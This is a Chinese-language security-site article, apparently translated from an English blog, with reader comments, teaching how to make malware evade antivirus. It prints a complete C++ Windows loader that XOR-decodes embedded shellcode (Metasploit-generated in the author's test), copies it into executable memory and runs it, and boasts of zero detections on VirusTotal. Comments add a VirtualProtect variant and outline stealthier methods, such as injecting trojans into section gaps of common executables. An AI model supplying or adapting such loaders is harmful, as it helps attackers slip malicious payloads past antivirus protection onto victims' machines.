免杀 - CVE漏洞中文网

如何利用十行代码，绕过杀毒软件实现免杀？

xiaix2016-03-28 金币奖励

+15共439132人围观，发现 34 个不明物体系统安全

我原本打算写一篇冗长的博客讲述针对不同杀毒软件的绕过技术，但当我开始着手写教程的第一章并上传样本到 virustotal 后，我震惊了！样本得到了 0/56 的检测率。于是我决定扔掉先前的长篇大论，转而记录这个快速、令人难以置信的简单方法。

我相信大部分的读者都会同意这个观点，绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而，我也偶尔会遇到一些人仅仅依靠工具生成二进制文件，这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。

在我们开始接触这段小巧的 C++ 代码前，我想先介绍一个可以非常棒的制造免杀的工具 Veil-Evasion (Veil-Framework的一部分)。这个工具非常神奇 (感谢 @harmj0y和他的小伙伴们创建了这个神奇的项目)，在几乎所有情况下，它都没有让我失望过。如果有，那我就要批评那些总是不停生成二进制文件然后上传到 virustotal 进行测试的人。如果你不这么做，那就会更加美好了。

无论如何，这就引出了一个问题，既然像 Veil-Evasion 这类的工具这么神奇，那为什么你要关心如何自己在二进制文件加入 shellcode？原因有很多：

大牛都很忙而且工具有些过时。

工具生成的二进制都拥有相似的指纹，不是指 payload，而是说工具编译二进制的结构有相似的指纹。

作为一个渗透测试工作者，你应当知道如何做。

在你看下面的代码前，你应该注意到这是针对 Windows 平台的，很明显代码中有 windows.h 的引用。

#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
 char b[] = {/* 插入你经过与'x'异或操作后的shellcode代码，例如：0x4C,0x4F, 0x4C */};
 char c[sizeof b];
 for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
 void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 memcpy(exec, c, sizeof c);
 ((void(*)())exec)();
}

很简单，上面的代码创建了一个可以自行添加包含 shellcode 的字符数组，关键点在于将你的 shellcode 与小写字母 ‘x’ 执行异或操作，然后分配一些内存，拷贝字符数组到分配的内存中，最后执行它。需要特别注意的是，你要先将 shellcode 与你选择的关键字(本例中为 ‘x’)进行异或操作，然后将 shellcode 放入到上面代码中并编译。

这时你可能会问“就这样？”。我了解你的感受，因为当时我也是这么想的，在写完第一章内容并上传样本到 virustotal 后并收到 0/56 的检测率。我想强调这是一个令人难以置信的简单和基础的技术，但它成功率却出奇的高。

你生成二进制文件的 SHA256 值可能跟我样本的不太一样，我样本中包含的 shellcode 是由 metasploit framework 生成的。

*原文：attactics，FB小编xiaix编译，转自须注明来自FreeBuf黑客与极客（FreeBuf.COM）

这些评论亮了

360安全卫士回复

感谢反馈，这个问题我们内部已知，将于下个版本更新修复此问题，感谢大家的支持！

)22(亮了
harmony回复

简直吓尿，这也能上freebuf ？？？当年会用这种方法免杀pi的人不下10万人，比本文浏览量还多。再高级一点的方法是，将木马编译成dll， dll转化成shellcode，上线之后传输shellcode执行。再高级一点的方式是，木马根本不以文件形式存在，而是感染常用软件的exe或dll，不添加区段，而是插入到区段空隙，hook第一个call来运行，不影响原软件运行。想想这都是十多年前玩的东西了，那一年，苍井空还是处女那一年，玛利亚还姓圣母。那一年，冠希还没有相机。那一年，李刚还没有儿子。那一年，凤姐只是个传说，那一年，我只信佛教不信春哥。那一年，菊花只是一种花，那一年，芙蓉也不是咱们姐。

)18(亮了
周鸿祎回复

360将在明天的更新中，解决这个问题，请广大消费者放心使用我们的产品。

)13(亮了
mlyuml(1级)回复

@ 周鸿祎周先生，
你好像没有更新过啊，

)10(亮了
傻蛋科技回复

有点厉害呀！中文翻译请看：如何利用十行代码，绕过杀毒软件实现免杀？

)8(亮了

发表评论

已有 34 条评论

周鸿祎 2016-03-28回复1楼

360将在明天的更新中，解决这个问题，请广大消费者放心使用我们的产品。

亮了(13)
- mlyuml (1级) 2016-03-28回复
  
  @ 周鸿祎周先生，
  你好像没有更新过啊，
  
  亮了(10)
sdf 2016-03-28回复2楼

还是太年轻…..

亮了(7)
傻蛋科技 2016-03-28回复3楼

有点厉害呀！中文翻译请看：如何利用十行代码，绕过杀毒软件实现免杀？

亮了(8)
一个勺子 2016-03-28回复4楼

大家看看，下边的代码，有什么特别吗？

ADFHOST3494 = "http://csdnim.qtmojo.com";
ADFCID3494 = 237;
ADFBID3494 = 3494;
ADFLOC = ‘CNSDRZ00′;
ADFUSER3494 = "http://csdnim.qtmojo.com/c?d=csdnim&i=z237,10537149,3494,17788&rf=&a=dWDfKu2yB1MHb2A5yG76z6Gb2MKA&u=";
ALLYESID4 = "DK0gK17Bm2A5yG92b5Z";
ADFPGC = "2,8,237,0,4611,3494,17788,10537149";

document.write("<script type=\"text/javascript\">\n");
document.write(" /*论坛帖子页右侧Button 220*120 创建于 2015-11-10*/\n");
document.write(" var cpro_id = \"u2394820\";\n");
document.write("</Scr" + "ipt>\n");
document.write("<script src=\"http://cpro.baidustatic.com/cpro/ui/c.js\" type=\"text/javascript\"></Scr"
+ "ipt>");

亮了(5)
- mlyuml (1级) 2016-03-28回复
  
  @ 一个勺子真特别，我竟然没有看懂
  
  亮了(7)
乖傻乖傻宝爱小宝 2016-03-28回复5楼

怎么过杀软行为检测。

亮了(6)
Lockmanxxx 2016-03-28回复6楼

亮点是红衣教主的评论？

亮了(6)
amaya (4级)给我五包辣条今晚我就是你的 2016-03-28回复7楼

如果明天这个文章还在，我赞赏楼主五包卫龙

亮了(7)
XXXX 2016-03-28回复8楼

你还不如说就一行代码，不就是个异或么，就是一句代码啊

亮了(6)
gongmo (1级) 2016-03-28回复9楼

用异或改变shellcode肯定不会被发现- -
没什么奇怪的。。

亮了(4)
aaaaaaaaaaa 2016-03-28回复10楼

表示n久以前面杀pi就用过的思路………

亮了(5)
cwg2552298 (6级)Follow my own course 2016-03-28回复11楼

只能与小写x异或吗？
异或过后，shellcode还能执行吗？

亮了(7)
- xiaix (6级)root@xiaix.me 2016-03-28回复
  
  @ cwg2552298 可以异或其他的，本文只是用x为例
  for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘x’;}
  看这里，运行前还会在执行异或操作转换回来，所以是可以执行的
  
  亮了(5)
于尛葵 2016-03-29回复12楼

只是文件免杀。你能绕过大数字的主动防御么？哈哈哈哈。中文翻译请看：如何利用十行代码，绕过杀毒软件实现免杀？

亮了(6)
hui 2016-03-29回复13楼

标题有点冷，有点冷… shellcode免杀最好是配合多态引擎生产出来的解密头是随机的密钥也是随机的。

亮了(4)
sdfd 2016-03-29回复14楼

msf 早就有了，还不如说，一行命令实现免杀，效果肯定不好

亮了(6)
hackbs (2级) 2016-03-29回复15楼

这特么早有了，不就是内存加载的一种么.

亮了(6)
JAZ123 (1级) 2016-03-29回复16楼

有针对Linux?

亮了(4)
cf浩哥 2016-03-29回复17楼

免杀什么的不算事主要是绕过主动防御头疼

亮了(5)
kindsjay 2016-03-29回复18楼

这代码简单粗暴。杀毒都不敢随便杀，不然误杀率会很高

亮了(5)
Arch Vile (3级) 2016-03-29回复19楼

我记得08年的冲击破用的就是这个方法的

亮了(5)
360安全卫士 2016-03-30回复20楼

感谢反馈，这个问题我们内部已知，将于下个版本更新修复此问题，感谢大家的支持！

亮了(22)
一招鲜 2016-03-30回复21楼

靠，这种办法都使用N年了，360还不知道？竟然周宏伟和安全卫士官方都来回复。

亮了(4)
harmony 2016-03-30回复22楼

简直吓尿，这也能上freebuf ？？？当年会用这种方法免杀pi的人不下10万人，比本文浏览量还多。再高级一点的方法是，将木马编译成dll， dll转化成shellcode，上线之后传输shellcode执行。再高级一点的方式是，木马根本不以文件形式存在，而是感染常用软件的exe或dll，不添加区段，而是插入到区段空隙，hook第一个call来运行，不影响原软件运行。想想这都是十多年前玩的东西了，那一年，苍井空还是处女那一年，玛利亚还姓圣母。那一年，冠希还没有相机。那一年，李刚还没有儿子。那一年，凤姐只是个传说，那一年，我只信佛教不信春哥。那一年，菊花只是一种花，那一年，芙蓉也不是咱们姐。

亮了(18)
- zhude111 (1级) 2016-04-14回复
  
  @ harmony 分享要鼓励如果你的办法好,可以分享你的,如果你不愿意分享,你可以闭上嘴而不要胡乱指责他人
  
  亮了(2)
一招鲜 2016-03-30回复23楼

其实，根本没必要这么复杂，用metasploit自己生存的shellcode，用它自带的编码器，自己设置一个长BADCHAR，用三行代码就可以免杀：
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* 你生存的shellcode */};
VirtualProtect(b,sizeof(b),PAGE_EXECUTE_READWRITE,&dwOldProtect)
((void(*)())b)();
}

亮了(1)
不会免杀 2016-03-30回复24楼

我表示在09的时候就这么干了，但是免杀时间只有两到三天，你的样本就会被杀，特别是360（我不当广告）当时为了测试特意让360上传样本

亮了(1)
hehe 2016-03-30回复25楼

这也能过? 就是一个异或加密而已啊
fb的小编能不能专业点?

亮了(4)
nullily (1级) 2016-03-30回复26楼

一个xor，搞毛线

亮了(1)
susftp (5级)中 2016-04-01回复27楼

行为过不了啊。

亮了(1)
Marlboro0OO 2016-04-12回复28楼

回复的赞:[doge]

亮了(0)
大神的大神 2016-09-02回复29楼

过加密免杀在apt应用还行，传播一天就杀杀杀

亮了(0)
yy 2016-11-18回复30楼

@ harmony 你暴露年龄了

亮了(1)